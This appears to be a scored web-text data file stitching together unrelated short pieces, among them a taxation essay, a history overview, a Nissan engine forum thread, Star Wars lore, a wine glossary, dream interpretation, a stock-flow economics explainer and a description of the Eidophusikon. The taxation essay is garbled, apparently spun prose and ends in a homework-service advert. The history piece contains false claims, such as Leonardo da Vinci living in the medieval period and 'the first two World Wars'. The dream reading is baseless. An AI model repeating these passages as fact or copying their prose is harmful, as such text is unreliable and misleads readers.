Taxation is more than applying and interpreting legislation. Societies require taxation in order to reallocate capital, to provide for expenditure on public services and goods. Taxation is a core area in which the broader fields of law and accounting, drawing together concepts from disciplines, along with concepts from economics. Knowledge and theories in a number of other disciplines, like sociology and psychology, have been used to support with a greater understanding of the impact of taxation on culture. What is the most important significance of taxation? The most important purpose of taxation is to produce funds/revenues used to settle expenses incurred by the government in promoting the common welfare of its citizenry. In mainly nations, specially our country, taxes are the major source of government's earnings. Others come from sale and borrowing of public lands and other government properties, interests on savings. The fundamental objective of taxation is to finance government outgoings. The government requires a range of development and welfare activities in the nation. It needs a vast amount of funds. The government collects funds by striking taxes. Raising more and more revenues has been an significant objective of tax. Tax is imposed on individuals according to their revenue level. High earners are imposed on high tax through progressive tax scheme. This prevents wealth being concentrated in a few hands of the rich. Thus narrowing the gap among rich and poor is another objective of tax. The tax collected by government is expended for carrying out a range of welfare actions. From this way, the wealth of the rich is redistributed to the whole society. Tax serves as an instrument for promoting economic stability, efficiency and growth. The government controls the economic activities of the state by providing diverse concessions, rebates and other services. An effective tax scheme can boost up the economy. The government can decrease the unemployment problem in the state by promoting a range of employment generating activities. Industries recognized in distant parts or industries providing more employment are set more services. The most important purpose of taxation is to build up funds for the functioning of the government machineries. There is no government in the world can run its administrative workplace without funds. The government can run its administrative set up through community funding which is collected in the type of tax. Thus, it can be well understood that the principle of taxation is very obvious and simple for proper functioning of a country. Taxes are charges levied beside a people's personal income or on property or for some specified movement. A regressive tax structure grades in low-income persons paying a higher percentage of their earnings on taxes than high-income persons. This type of tax structure tends to shift the burden of taxation to the poor. How a government defines income subject to an exacting tax schedule or rate is also essential. For example, the United States government treats earned income another way than investment income, and provides investment income a preferential tax rate. The government imposes a higher rate of tax on income earned through salary and wages than on income earned on investments. In a proportional tax structure, tax rate does not depend upon the relative income level of taxpayer. You can also think of a proportional tax rate as a 'flat tax.' The example of a flat tax in the United States is a sales tax. The poorest member of the society pays the equal sales tax on a television as richest. A proportional tax system theoretically should create an equal tax burden for all the taxpayers, but some dispute it doesn't. A progressive tax structure is just opposite of a regressive tax structure. In this type of progressive tax system, the taxpayers making more capital pay higher tax rates than those making less capital. The United States uses a progressive income tax structure. A progressive tax structure tends to shift the burden of taxation to the wealthy. Anybody who is trying to obtain rid of difficult issues of Taxation can typically think of not something else. Many Taxation Assignment Help forces like mywordsolution will advise you the secret to overcome your problems in developing the theory in an effective manner and are to pay them off by spending fewer and saving your money. From mywordsolution assistance services you can acquire the merits of step-by-step learning process. It is very important for the students to be recognizable with the basic concepts devoid of confusion. These types of online support services have a experienced and qualified team who will aid you in finishing your homework within the deadline.
0.99892
What Were the Major Time Periods in History? Our history goes back millions of years ago. The world would not have arrived to where it is right now if it had not gone through a long and extensive process of historical development. In keeping up with the study of the advancement of the world, one has to ask himself, "What were the major time periods of history?" The answers seem simple, yet the story behind each goes back to a rich and colorful process of social and cultural revelations. The world is said to begin during the prehistoric era. History is all about the act of recording events that had happened in the past, and the prefix "pre" in "prehistoric" implies that this is the period of time when human beings still lack the capacity to aggregate important events. This era dates back from a more than two million years in the past until 6,000 B.C. It is divided into certain periods, namely the Stone Age, the Bronze Age, and the Iron Age. As of now, this is the era that has the fewest recorded facts by modern humans, although a huge number of archeologists are working night and day to excavate and study various artifacts from this period. Right after the prehistoric era comes the ancient period. This is considered as the official time when humans begin to record events. The span is said to be almost five thousand years. After the Neanderthals began migrating to different parts of the globe, various settlements were established which soon turned into towns and cities. Excavations were made on the land. The use of fire was mastered. This era would not have been complete without the rich dynasties of Egypt, China, India, Greece, and many more. Most historians consider this as the period of enlightenment in terms of culture and religion. The middle ages, more known as the medieval period, succeeded the ancient period in a gradual manner. After the fall of the Roman Empire in the year 476, the era finds itself continuing certain aspects of Late Antiquity, which includes depopulation and any form of barbaric acts. Agriculture plays a huge role in the development of its feudal system, which in turn strengthens the presence of monarchy. This period is also well-known for the birth of numerous personalities such as Thomas Aquinas, Dante Alighieri, Leonardo da Vinci and Marco polo. The Catholic Church's role in the development of the middle ages is said to be vaster than ever. The arrival of the modern period was considered quick and almost non-felt. Beginning sometime in the 16th century, a number of significant events highlight the era's importance. Historians often attribute Europe in the overall definition of the period. Modern history primarily includes the Industrial Revolution, which involves the invention of a number of products such as the steam engine. Engineering as a field skyrocketed due to the number of advanced technology emerging each year. Contemporary history is considered by many as the final historical period as of the present. The term has been used as early as the 19th century whereas most historians consider contemporary era as the era that can still be remembered by living memory. Some of the most significant events to ever happen during this period are the first two World Wars, the LSD controversy of the 70's, the debates regarding the greenhouse effect, and of course, the emergence of the computer, the cellphone, and the numerous social media networking sites. In conclusion, in asking the question, "What were the major time periods of history," it is vital to begin from the prehistoric era before ending with the present.
0.999089
Overhead cams have valve lifters ? #1: Overhead cams have valve lifters ? I'm getting lots of loud clacking on a 96 Nissan Sentra 1.6 Liter. Sounds like it's coming from the head. It has overhead cam, I believe. sludged up lifters would NOT be causing the clacking. has been happenning for about 2 years, and is slowly getting worse. if you open the cap with the engine running. Oil and filter changes have been done every 5K to 7K. #2: Re: Overhead cams have valve lifters ? Your valve rockers need adjusted. &gt; I'm getting lots of loud clacking on a 96 Nissan Sentra 1.6 Liter. &gt; Sounds like it's coming from the head. It has overhead cam, I believe. &gt; sludged up lifters would NOT be causing the clacking. &gt; has been happenning for about 2 years, and is slowly getting worse. &gt; if you open the cap with the engine running. &gt; Oil and filter changes have been done every 5K to 7K. #3: Re: Overhead cams have valve lifters ? A GA16DE is a DOHC engine!!! #4: Re: Overhead cams have valve lifters ? role in how hard or soft it gets. head looks clean through the oil cap as you state. clearances (fairly easy) and make sure they were in spec. you are done with the noise issue. #5: Re: Overhead cams have valve lifters ? didn't mention checking the valve clearance either. though. It's a 4 cyl 1.6 Liter automatic trans. only at light throttle. Could be the timing chain ? crank with a wrench, to get the valves in the right spot to check ? #6: Re: Overhead cams have valve lifters ? &gt; though. It's a 4 cyl 1.6 Liter automatic trans. but the 1.6L in 1996 is a GA16DE. &gt; only at light throttle. Could be the timing chain ? &gt; crank with a wrench, to get the valves in the right spot to check ? service manual or copies of the appropriate pages from the library. procedure right out of the manual.
0.578309
The Senex-Juvex was a region on the edge of the Mid Rim of the galaxy that comprised the Senex sector and the Juvex sector. Though the region was nominally split into the two sectors, in practice the Senex-Juvex formed a single cultural region, ruled by wealthy Human noble houses that rejected centralized government and supported themselves through an active slave trade. Formed by a group of Core Worlds nobles led by Thull Vandron around 1000 BBY, the Senex-Juvex fiercely guarded its independence and only joined the Galactic Republic shortly before the Clone Wars. The Senex-Juvex was a dense cluster of star systems distributed around the nebula Thull's Shroud. Formed as a rejection of centralized power, there was no government in the region beyond that of the noble houses, which controlled their own planetary fiefdoms. Of the seventeen families that originally set out from the Core, nine settled the systems in the eastern reaches of Thull's Shroud, forming the Senex, while eight families settled the western systems, forming the Juvex. The Senex-Juvex became a region of vast agricultural worlds ruled by aristocrats, pleasure planets, and wilderness worlds reserved for nobles' safaris. The region's native species were almost totally enslaved to the Human aristocrats. On the rare occasions when a region-wide policy was required, the noble houses would meet for councils or synods on the pleasure planet Nantama. Neelanon and Juvex were the nominal capitals of the respective sectors, though within the Senex-Juvex this meant little. More important in the Senex were Karfeddion, the homeworld of House Vandron and a major agriworld; Atron, a major urban, industrial and commercial center controlled by House Garonnin; Doreen, a waterworld controlled by House Petro and the source of Doreenian ambergris, a traditional perfume ingredient; and Suliana, a cotton-producing tradeworld controlled by House Hax that served the Tangles. In the Juvex sector, Kassido was an urban world that controlled Coreward trade, making it one of the most-populated and wealthiest planets in the region; Deminol was a bustling port world known for its universities; Resti Kel was an industrial world controlled by House Kellermin, known for its athletic competitions; and Loovria was a world infamous for its gladiatorial fights. Under the Galactic Empire, the Senex-Juvex bordered the Ninth Quadrant, the Agarix sector, the D'Aelgoth sector, and the Hadar sector. The Senex Trace stretched east to connect Karfeddion with the Rimma Trade Route near Sullust. Other routes in and out of the region were the Veron Route, the Anturi Reach, the Velga Route, the Agarix Trade Route, and the D'Aelgoth Trade Route. The main route within the Senex-Juvex was the Senex-Juvex Loop. Following the defeat of the Brotherhood of Darkness during the New Sith Wars, the war hero and hyperspace explorer Thull Vandron was elected to the Galactic Senate. A great opponent of centralized government power, Vandron helped craft the Ruusan Reformations that decentralized the Galactic Republic. Vandron felt that the reforms ultimately did not go far enough, however, and he gathered a group of like-minded, wealthy Core World families and headed into the outer reaches of the galaxy. Following secret hyperspace routes that Vandron had discovered, they settled the systems around a nebula on the edge of the Mid Rim that was later named Thull's Shroud in Vandron's honor. Vandron and his followers rejected any government beyond that of their own noble houses, which numbered seventeen. Nine houses—Vandron, Garonnin, Elegin, Anturi, Taneel, Petro, Araba, Hax and Viholn—settled the eastern reaches of Thull's Shroud, forming the Senex. The western systems became the Juvex, divided among Houses Sreethyn, Carbinol, Halliikeenovich, Sisemon, Kassido, Kellermin Pilor and Mekuun. The settlers' technology was far ahead of the region's native species. Conquering world after world, the seventeen houses took control of all of the habitable planets they could reach and by 900 BBY, had consigned virtually all the region's species to slavery and were the unquestioned masters of the region. Early in its history, the Senex and the Juvex were divided into four quadrants each. For nearly two centuries, the Senex and Juvex Lords were secure on their plantation worlds, doing little more than conducting aristocratic, dynastic plots against each other. Republic scouts soon began penetrating the Mid and Outer Rims, however, and the Senex-Juvex faced a powerful new rival in Eriadu, dominating the crossroads of the Hydian Way and Rimma Trade Route in the southern Outer Rim. In 700 BBY, the Houses annexed a a swath of adjacent systems as a buffer zone against Eriadu, establishing the Ninth Quadrant. The Senex-Juvex and the Galactic Republic coexisted uneasily. The Houses rejected the Republic's entreaties, sometimes going as far as to mine the hyperspace routes into the region. The Senex-Juvex's isolationism and aristocratic rule made it the subject of many wild spacer tales, many of which were on the whole true. In the Republic's last centuries, traders and merchants forged new routes into the Senex-Juvex and the Houses realized that they had fallen behind the wider galaxy technologically. The Senex-Juvex's backwardness was brought home to the Houses in 553 BBY, when the warlord Osted Picutorion married Farasa Anturi, the mad princess of House Anturi, the weakest of the Senex houses. Picutorion then began a war known as the Crimson Days, defeating the combined forces of Houses Vandron and Petro, freeing the Hutlarians from slavery, and occupying Karfeddion. The Crimson Days came to an end with the Third Nantama Synod, which accepted the independence of Hutlar and the marriage of Picutorion and Anturi. Within a century, House Anturi had become House Picutorion, and the rebellious Juxex House Mekuun had dissolved its holdings and sought recognition as a Republic sector. Meanwhile, the Republic forcibly annexed the Ninth Quadrant as part of the Bozhnee sector. At the Fourth Nantama Synod, the Houses of the Senex-Juvex accepted political realities and agreed to seek peace with the Republic. The Republic split the region into the Senex sector and the Juvex sector, though the Houses generally did not recognise the division. They did, however, return two Senators to Coruscant and began negotiations with various megacorporations to open up the Senex-Juvex's commerce. The Senex-Juvex's active slave trade fell afoul of the Rights of Sentience clause of the Galactic Constitution however, and the Houses' refusal to abandon something they considered an integral part of their culture meant that the Galactic Senate imposed serious restrictions on trade with the region. The Houses were forced to do business through front companies and criminal groups. Around 33 BBY, the terrorist group known as the Nebula Front operated out of the Asmeru system in the Senex-Juvex. The Houses' assistance in suppressing the Nebula Front meant that the Republic relaxed trade restrictions somewhat. After the Declaration of a New Order in 19 BBY, the Senex-Juvex Lords benefited from the Galactic Empire's abolition of the Rights of Sentience clause and Emperor Palpatine's legalisation of slavery as a punishment for "crimes against the civil order". This allowed the Houses to continue their slave trade on the basis that their rule constituted the civil order in the Senex-Juvex. The Senex-Juvex Lords were able to continue their activities undisturbed in the chaos that followed the Battle of Endor in 4 ABY. Neither Grand Admiral Thrawn nor the New Republic made significant inroads there during the Galactic Civil War. In 12 ABY the former Emperor's Hand Roganda Ismaren approached the Senex-Juvex Houses for financial support for her scheme to proclaim her son Irek a new Emperor. New Republic agents disrupted the meeting of nobles on nearby Belsavis, however, forcing Roganda Ismaren into hiding. The Senex-Juvex accepted refugees during the early Yuuzhan Vong War, though many saw this as a cynical attempt to gain a new influx of slaves. Droma intended to take the Ryn to the region in 26 ABY.
0.995371
LDR 1-1/2 in. x 1-1/2 in. Flexible Coupling at Tractor Supply Co. LDR 1-1/2 in. x 1-1/2 in. Flexible Coupling connects any DWV Piping System Cast Iron, Plastic, Copper and Steel. can this product take high temperature? No, highest temperature recommended is 130 degrees Fahrenheit, and that is if it is intermittent.
0.986107
Here is a whole bunch of Italian wine terminology and wine terminology in general to help you understand the complex world of wines. I know I’m learning quite a bit. - A vinegar like taste. - Wines that contain acids. - Semi-sweet wines usually referencing sparkling wines. - The wine’s vintage year. - French system regulating authenticity. - A winery which also produces other products besides the grapes used under it’s label. - A relative degree of fruity quality, acidity, tannins and alcohol. - Refers to the top of the hill Piedmontese dialect and is used to indicate particularly prestigious vineyards. A wine merchant whose wines come from mainly purchased grapes. - Farmhouse used for estate wines. - The limited area within the confines of a particular D.O.C. zone. - A town with its own production facility. - Straw cased bottle used by Chianti producers. - Fruits of the forest such as blackberries, strawberries and raspberries. - Wine made from unripe grages. - The percentage of alcohol in a wine. - Wines with a slight hint of honey flavor. - Bottled by the producer at the source. - Bottled by a cooperative winery. - The lingering aftertaste of the wine. - A strong wine sometimes fortified. - Oxidized with a brownish color and stale oder. - A term used in making sparkling wine. - a vintage for sparkling wine. - A classification of grapes that produceCabernet Sauvignon, Merlot, Chardonnay, Sauvignon Blanc, Semillon and Reisling. - Spoiled form too much air. - Wines mad from partially dried grapes. - A small wine estate of farm. - Wines made from dried grapes in the style of passito. - A D.O.C. or D.O.C.G. aged for more than three years. - Selected late harvested D.O.C. wines. - Used in Piedmont for a hillside vineyard with a certain favorable. - An anti-oxidant introduced in some wines in small amounts. - Dry or Sweet Sparkling wines. - Indicates D.O.C. wine that meets standards above normal requirements. - Having residual sugar from fermintation. - A dried grape to be used for wine. - Describes aged D.O.C. wines. - Term for grape grower. - Wines in Italy that are sold after one month. - Wines made from grapes dried on straw mats. - The art and science of winemaking. - Vine or grape variety. - Having the aroma or taste of an aging barrel.
0.999981
Are student loans in deferrment included in the debt to income calculation? In almost all cases they are (fannie mae or Freddie mac).The best way to minimize the monthly amount used in calculating your total monthly debt to income ratio, is to get something from them that documents what your monthly payment would be if you were to pay it. They are generally happy to provide that (per government student loans at least). Otherwise the percentage used to calculate monthly debt is likely to result in a higher monthly debt.
0.999994
Dream about a lion chasing someone symbolises feelings of rejection or not fitting into a group. You may be possessing a guilty conscious, some inner fears or repressed negative feelings. You may be experiencing or inflicting fear, emotional distress or physical abuse in your life. This dream is a symbol for unforeseen circumstances might hinder your desires and wishes. You are having a difficult time trying to relax and being at ease. A lion chasing someone dream refers to your thoughts and fears of death. No detail gets passed you. You can not avoid the issue or a person any longer. It is about a cleansing and a release of negative or repressed emotions. You are subconsciously trying to hold yourself back. A member of your household could be going through some rough times, and as a result might become overly dependent on your moral and emotional support. This is flattering, but it could also be a drain on your energy. Carefully consider what you really need to say to your friend. Sometimes you have to hit a person over the head with the truth (figuratively speaking) in order to wake them up.
0.99552
- Durante el presente mes de enero se va a remodelar la sección de Listening. Ello supondrá la sustitución de algunos de los actuales e inclusión de otros nuevos. Los mismos serán divididos en 3 niveles de dificultad (básico, intermedio y avanzado). What are these clothes? - ¿Qué es la siguiente ropa? 1. In summer, people usually wear shirts with short - ? - leaves flies sleeves ties . 2. I have definitely put on weight. These jeans are really - ? - cool tight loose baggy . 3. Before I buy this suit, I’d like to - ? - take it out try it on try it out test it out . 4. If something is not the correct size, you say it doesn’t - ? - suit you go with you size you fit you . 5. If you are doing sport, it’s a good idea to wear a - ? - a tracksuit a dressing gown dungarees an apron . Match the clothes idioms with their meanings. - ? - a) making a decision or doing something very quickly without thinking about it too much. b) make yourself look really good by wearing your best clothes. c) you are restless and cannot sit still. d) don't lose your temper and stay calm. e) is the boss in the family and makes all the important decisions. - Haber ropa tendida (en sentido figurado, "habla bajo, que hay ropa tendida") = keep your voice down, the walls have ears! La siguiente son prendas de vestir que tienen forma plural porque consistan de dos partes unidas. Para poder contar estos objetos se antepone "a pair of" My jeans are very tight. - Los vaqueros me están muy justos. I’ve got two pairs of black shoes. - Tengo dos pares de zapatos negros. Este mes, una agenda personal para que puedas planificar tus tareas a lo largo del año de una manera organizada. Puedes incluir notas de texto, imágenes etc. y manejar tus contactos. Su uso es muy simple y con un atractivo interface, ofrece no obstante características avanzadas como encriptación e importación y exportación de datos a Outlook.
0.960298
How money and debt are described in simple economic models colours economists' interpretation of real world monetary systems. My feeling is that money is somewhat superfluous in these models, but it is necessary to understand why that is the case. This article explains how money and government debt (Treasury bills) operate in the second simplest Stock-Flow Consistent (SFC) model in the textbook Monetary Economics by Godley and Lavoie -- model PC (Portfolio Choice; found in chapter 4). If the reader is familiar with mainstream models -- like Dynamic Stochastic General Equilibrium models (DSGE) -- the treatment of money and debt is generally similar to model PC. There are a number of convention differences, which means that the formulae look different, but they quite often imply the same behaviour. The real differences show up in the philosophy of the solution of the model, which actually should not affect how money and debt operate as instruments. In interests of brevity, I will defer the discussion of the differences to later. However, understanding how money and debt work within a SFC model -- which can be cleanly solved -- will prepare readers' understanding of the more poorly-defined DSGE models. Model PC is found in Chapter 4 of Monetary Economics: An Integrated Approach to Credit, Money, Income, Production and Wealth, by Wynne Godley and Marc Lavoie. This text has become the standard for learning about SFC models. It is a textbook, and so it may be imposing to readers who are less mathematically inclined. This article (and similar ones) aims to give a non-technical overview to the topic; either as an aid to understanding the text, or at least to introduce the basic concepts. The text itself contains a lot of information, which my summaries cannot hope to cover. For those of you without the text, the models are available online at the sfc-models site: http://models.sfc-models.net/ Shown below is a screenshot of the Excel spreadsheet version of model PC. You may be able to relate the variables within the spreadsheet to my diagram (although my labelling might be slightly different). The number of equations is impressive for what is actually a fairly simple model. We start of with the flows in the SIM model, as shown above. (Note that this diagram adds taxes, unlike the diagram shown in the previous article.) This model only has "money" -- which bears no interest -- as a financial asset. It is denoted H within the equations, as it is what is referred to in economist jargon as high powered money. Note that Government Expenditures (denoted G) is an exogenous variable that drives the system; all other variables are determined by it (and the previous stock of government money held from the previous period). The government generally uses deficit financing, issuing money (which it creates at no real cost) in consequence. If money were gold-backed, we would need to track the government's gold holdings within the model, as that would limit the ability to issue money. I have labelled the government as "Consolidated Government." This entity includes the Treasury (fiscal agency) and the central bank. Within model SIM, it makes little sense to dis-aggregate the consolidated government, but that changes when we move to model PC. As discussed in the previous article, the business sector has the apparently magical ability to hire exactly enough workers so that total revenues equals its wage bill. Since the business sector is always just breaking even, it pays no tax. This is unrealistic (perhaps other than the taxation part), but relaxing this assumption greatly increases the model complexity -- otherwise, we need to allow for the business sector to have a mismatch production and sales. That possibility implies the need to track inventory, and business sector holdings of money. The number of "state variables" within the model starts to explode. Although we can solve those more complex models numerically, intuition is harder to come by. With the business sector behaviour locked down, the diagram makes it clear that there is only one decision to be made within the model -- how will the household sector allocate its income between consumption and saving? Once that decision is reached, all other behaviour is determined by the income flows. The decision itself is reached via a consumption function. The diagram above illustrates the flows within Model PC. There are three functional differences. The government pays interest upon Treasury bills (which are only held by households outside the consolidated government). The interest rate on Treasury bills acts as a new external (exogenous) variable. I will discuss how model PC behaves in later articles. In particular, the effect of interest rate changes might not be intuitive. The explanation is found in the text, but the reader may experiment with the numerical models to test its behaviour. The remainder of this article discusses how money is handled in SFC models in general, which generally follows the pattern of model PC. Within the SFC model framework, it is straightforward to add new asset classes, at the cost of increasing model complexity. The decision process is similar -- the household first decides the level of consumption, and then the asset weightings in the portfolio. The issue with adding new assets is how to model their prices. Is it possible to reflect the behaviour of the equity market within a simplified model? The risk is that small behavioural differences can result in completely different outcomes. The deposit convention says that the interest payment made in a period is equal to the previous period's "Treasury bill" holdings times the previous period's interest rate. Since there is a dependence upon the previous period's values, we need to be careful about the time period within formulae. There are a number of economically equivalent ways of defining how interest payments occur -- the only difference between them is that we may need to shift some time series by one period in order to align model solutions. The difficulty is that we are using abstract accounting periods, and there is an fuzzily-defined notion of the "beginning of period" and "end of period" values. The only way to eliminate this fuzziness is to somehow build a model that tracks every transaction, which is well beyond our modelling capabilities. As an example of how time conventions matter, imagine that we have a model household that receives $100 in wages in time period 0 (and has no other financial assets "at the beginning of the period"). Furthermore, the one-period interest rate is set at 1%. It then wishes to buy a Treasury bill in period 0, and then use the proceeds to buy $101 in goods (1% interest). The convention of Monetary Economics is that it bought $100 in Treasury bills (market value) during period 0, and then has $101 available to purchase goods in period 1. Another possible convention is that it buys the Treasury bill "at the end of Period 0", and then it receives the $101 "at the end of Period 1", which means that it can only purchase the goods during Period 2. This convention enforces more of a delay within the system, and perhaps is more realistic. But it raises the question whether the household could sell the Treasury bill during period 1 in order to make purchases at that time point. A fairly nonsensical convention would be that the household buys the bills during the period, then they mature at the end of the period, and it purchases $101 in goods at the period end. I believe that it would be possible to get the model accounting to work, but it would require the ability to allow Treasury bill trading within the model period. (The household would have to buy an existing Treasury bill from a holder at the beginning of the period, which matures at the end of the period.) New Treasury bills would have to be auctioned at the "end of the period." Within the mainstream literature, there is a fair amount of mysticism about the "governmental budget constraint." With SFC models, the dubious "inter-temporal" component disappears (the condition on infinite time horizons), and all that matters is the single-period accounting constraint. All this constraints says is that government accounting properly follows the rules of double-entry accounting. This is not particularly interesting, other than by comparison to some older mainstream models where the accounting was not done correctly. Within model PC, the household decisions are hierarchical. The household sector first decides on the level of consumption for the period. (This is based on starting wealth, interest and wage income.) The remainder is saved, which increases the value of its portfolio of financial assets (money and Treasury bills). The portfolio is allocated between money and Treasury bills. Since money does not pay interest, it is less attractive attractive as interest rates climb. Hence, the allocation function depends upon the level of interest rates. This raises an obvious issue -- how can the household sector change its portfolio allocation? The business sector holds no financial assets, and there are no other non-government sectors. (The foreign sector has not yet been introduced.) Therefore, by process of elimination, the portfolio allocation decision by households must be accommodated by the consolidated government sector. That is, the consolidated government must adjust the money and Treasury bill outstanding amounts to match the whims of the household sector. The mechanism that allows this is the central bank. It holds Treasury bills as assets, and issues money as a liability. Since money pays no interest, and there is no possibility of capital gains/losses on Treasury bills within the model, the central bank earns a steady profit from interest payments on its portfolio. The central bank is then assumed to pay the profits immediately back to the Treasury, so that the total interest cost for the government is just the interest paid on Treasury bills owned by the non-government. Within the SFC model, the level of interest rates is fixed by the central bank (and is external to the model). The amount of money held is entirely determined by the portfolio preference of households. This corresponds to "normal" central bank behaviour, where the policy committee sets the level of interest rates, and the money supply is determined by private sector behaviour; the central bank has to engage in "open market operations" to keep the overnight rate near target. Alternatively, if the portfolio allocation function is obliging, the central bank could target the amount of money in the system. The central bank adjusts the interest rate until the money supply hits target. Within the context of this model, there is no way of distinguishing the targeting regime. This ambiguity has been exploited by some economists who are fixated on the money supply. In the real world, the size of the money supply is driven by more complicated factors. For example, in the United States, banks need to hold reserves against certain types of deposits. The interchangeability of interest rates and the money supply starts to break down. It should be noted that what is discussed in this section has been the object of considerable controversy -- "endogenous money" versus "exogenous money." The one advantage of delving into models such as this is that we can see that much of the debate is a waste of time. Within this model, the notion of Quantitative Easing (QE) makes little sense. (Quantitative Easing in the purchase of bonds by the central bank, in order to increase the size of the monetary base.) The only asset it can purchase are Treasury bills, which are the only instrument bearing a rate of interest. The only way the central bank can increase the monetary base is via lowering interest rates, until it hits 0%. At which point, it is free to push the money/bills allocation around, but that has no effect on households -- it has exactly the same interest income regardless of allocation, which is zero. Broadly speaking, QE does not make sense in the real world either. Since real-world QE operations involve the purchase of bonds, it is possible that there would be some effect on the economy. That would require the use of a more complex model (with more financial assets) to judge. How do real-world monetary systems relate to the model conventions? How does the handling of money and debt differ between a SFC model and a DSGE model? What are the effects of interest rate changes within the SFC model? What's up with "helicopter drops"? I hope to cover some of these topics in later articles.
0.742137
Not to be confused with Duchy of Silesia. Austrian Silesia (German: Österreichisch-Schlesien (historically also Oesterreichisch-Schlesien, Oesterreichisch Schlesien, österreichisch Schlesien); Czech: Rakouské Slezsko; Silesian: Austrijacki Ślůnsk; Polish: Śląsk Austriacki), officially the Duchy of Upper and Lower Silesia (German: Herzogtum Ober- und Niederschlesien (historically Herzogthum Ober- und Niederschlesien); Czech: Vévodství Horní a Dolní Slezsko), was an autonomous region of the Kingdom of Bohemia and the Habsburg Monarchy (from 1804 the Austrian Empire, and from 1867 Cisleithanian Austria-Hungary). It is largely coterminous with the present-day region of Czech Silesia and was, historically, part of the larger Silesia region. Austrian Silesia consisted of two territories, separated by the Moravian land strip of Moravská Ostrava between the Ostravice and Oder rivers. The area east of the Ostravice around Cieszyn reached from the heights of the Western Carpathians (Silesian Beskids) in the south, where it bordered with the Kingdom of Hungary, along the Olza and upper Vistula rivers to the border with Prussian Silesia in the north. In the east the Biała river at Bielsko separated it from the Lesser Polish lands of the Polish–Lithuanian Commonwealth, incorporated into the Austrian Kingdom of Galicia and Lodomeria upon the First Partition of Poland in 1772. The territory west of the Oder river stretching from the town of Opava up to Bílá Voda was confined by the Jeseníky mountain range of the eastern Sudetes in the south, separating it from Moravia, and the Opava river in the north. In the west the Golden Mountains formed the border with the County of Kladsko. The area originally formed the south-eastern part of the Medieval Duchy of Silesia, a province of the Piast Kingdom of Poland. During the 14th century most Dukes of Silesia had declared themselves Bohemian vassals. As part of the Lands of the Bohemian Crown, Silesia was inherited by the Habsburg archduke Ferdinand I of Austria in 1526, after the last Jagiellon king Louis II of Bohemia had died at the Battle of Mohács. With the female succession of the Habsburg empress Maria Theresa to the throne in 1740, the Prussian king Frederick the Great laid claim to the Silesian province and, without waiting for any reply, on 16 December started the First Silesian War, thereby opening the larger War of the Austrian Succession. His campaign was concluded in 1742 with the Prussian victory at the Battle of Chotusitz leading to the treaties of Breslau and Berlin, in which Silesia was divided. parts of the former Moravian Duchy of Opava with Duchy of Krnov south of the Opava River, comprising several Moravian enclaves. forming the Duchy of Upper and Lower Silesia, which remained a Bohemian crown land with its capital in the city of Opava. In 1766 the title of a Duke of Teschen was granted to Prince Albert of Saxony, son-in-law of Maria Theresa, while the title of a Duke of Troppau and Jägerndorf remained with the Princely Family of Liechtenstein. The Nysa territory was held by the Bishops of Wrocław with their residence at Castle Jánský vrch (Johannisberg). When in 1804 the Habsurg emperor Francis II established the Austrian Empire, his title would include the "Duke of Upper and Lower Silesia". Austrian Silesia was connected by rail with the Austrian capital Vienna, when the Emperor Ferdinand Northern Railway line was extended to Bohumín station in 1847. In the course of the Austro-Hungarian Compromise of 1867 the Duchy of Upper and Lower Silesia became a crown land of Cisleithanian Austria. In 1918, the Austrian monarchy was abolished and the major part of Austrian Silesia was ceded to the newly created state of Czechoslovakia by the 1919 Treaty of Saint-Germain-en-Laye, with the exception of Cieszyn Silesia (the former Duchy of Teschen), which after the Polish–Czechoslovak War was split in 1920 along the Olza river with its eastern part falling to the Autonomous Silesian Voivodeship of Poland. Smaller parts of the duchy also became a part of Poland, while the adjacent Hlučín Region of Prussian Silesia fell to Czechoslovakia. For example, in 1900, there were 8 Bezirkshauptmannschaften in Austrian Silesia (in comparison to above list without Frydek). Wikimedia Commons has media related to Austrian Silesia.
0.999682
How will I know that alligation is what they are asking for or it is another equation? When you are asked to prepare some kind of mixture and have a higher concentration to work from, and a lower concentration to dilute it with then an Alligation can likely be used. One analogy to help remember it by is mixing cocktails. Suppose that you have some friends over and one asks you to make her an alcoholic beverage. Let's say a gin and tonic. Gin is usually 80 proof, which means it's 40% ethanol. Tonic water is 0% ethanol. The reason we mix drinks is to dilute the alcohol and make a drink that is less than 40% ethanol. That's basically what you're doing with an alligation also. Hopefully, this analogy will be easy to remember. The only other thing to remember is it only works when you are dealing with 2 different strengths. (one higher and one lower) The other thing that trips some people up is they forger that Water can usually be used and is 0%. So, they see a question that says: How much solution "o" 20% is needed to prepare 500mL of 10% Solution "o".
0.993749
1. Globalization is ultimately a positive for humanity. Write an essay about 500 words. Globalization is ultimate a positive thing for humanity. This position is based on some supporting truths and ideas. First, globalization has created market diffusion(Metz, 2013).In this note, many markets are now accessible throughout the world. There is a free flow of goods and services across international borders………………………..
0.999997
Text: The stage on which the Eidophusikon was represented, was little more than six feet wide, and about eight feet in depth; yet such was the painter’s knowledge of effect and scientific arrangement, and the scenes which he described were so completely illusive, that the space appeared to recede for many miles, and his horizon seemed as palpably distant from the eye, as the extreme termination of the view would appear in nature. The opening subject of the Eidophusikon represented the view from the summit of One-tree Hill, in Greenwich Park, looking up the Thames to the Metropolis; on one side, conspicuous upon its picturesque eminence, stood Flamstead House; and below, on the right, the grand mass of building, Greenwich Hospital, with its imposing cupolas, cut out of pasteboard, and painted with architectural correctness. The large groups of trees formed another division, behind which were the towns of Greenwich and Deptford, with the shore on each side stretching to the metropolis, which was seen in its vast extent, from Chelsea to Poplar. Behind were the hills of Hampstead, Highgate, and Harrow; and the intermediate space was occupied by the flat stage, as the pool or port of London, crowded with shipping, each mass of which being cut out in pasteboard, and receding in size by the perspective of their distance. The heathy appearance of the fore-ground was constructed of cork, broken into the rugged and picturesque forms of a sand-pit, covered with minute mosses and lichens, producing a captivating effect, amounting indeed to reality. This scene, on the rising of the curtain, was enveloped in that mysterious light which is the precursor of day-break, so true to nature, that the imagination of the spectator sniffed the sweet breath of morn. A faint light appeared along the horizon; the scene assumed a vapourish tint of grey; presently a gleam of saffron, changing to the pure varieties that tinge the fleecy clouds that pass away in morning mist; the picture brightened by degrees; the sun appeared, gilding the tops of the trees and the projections of the lofty buildings, and burnishing the vanes on the cupolas; when the whole scene burst upon the eye in the gorgeous splendour of a beauteous day. The clouds in every scene had a natural motion, and they were painted in semi-transparent colours, so that they not only received light in front, but, by a greater intensity of the argand lamps, were susceptible of being illuminated from behind. The linen on which they were painted was stretched on frames of twenty times the surface of the stage, which rose diagonally by a winding machine. De Loutherbourg, who excelled in representing the phenomena of clouds, may be said to have designed a series of effects on the same frame; thus, the first gleam of morn led to the succeeding increase of light; and the motion being oblique, the clouds first appeared from beneath the horizon, rose to a meridian, and floated fast or slow, according to their supposed density, or the power of the wind. 